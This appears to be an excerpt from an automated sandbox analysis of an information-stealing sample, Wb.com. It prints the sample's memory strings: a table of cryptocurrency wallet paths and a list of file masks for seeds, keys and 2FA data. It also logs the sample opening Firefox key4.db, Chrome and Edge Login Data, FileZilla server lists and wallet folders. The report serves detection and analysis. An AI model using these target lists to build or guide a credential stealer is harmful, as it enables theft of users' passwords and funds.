                Source: Wb.com, 0000000C.00000002.3028437270.000000000057C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: in\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Wb.com, 0000000C.00000002.3028437270.000000000057C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: in\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Wb.com, 0000000C.00000002.3028437270.000000000057C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: in\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Wb.com, 0000000C.00000002.3028437270.00000000004AD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
                Source: Wb.com, 0000000C.00000002.3028437270.00000000004AD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
                Source: Wb.com, 0000000C.00000002.3028437270.00000000004AD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                Source: Wb.com, 0000000C.00000002.3028437270.000000000057C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: in\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Wb.com, 0000000C.00000002.3028437270.000000000057C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: in\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Wb.com, 0000000C.00000002.3028437270.000000000057C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: in\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Wb.com, 0000000C.00000002.3028437270.000000000057C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: in\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Wb.com, 0000000C.00000002.3028437270.000000000057C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: in\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\events\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\security_state\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\bookmarkbackups\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\to-be-removed\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\minidumps\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\tmp\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\key4.dbJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                Source: Wb.comBinary or memory string: WIN_81
                Source: Wb.comBinary or memory string: WIN_XP
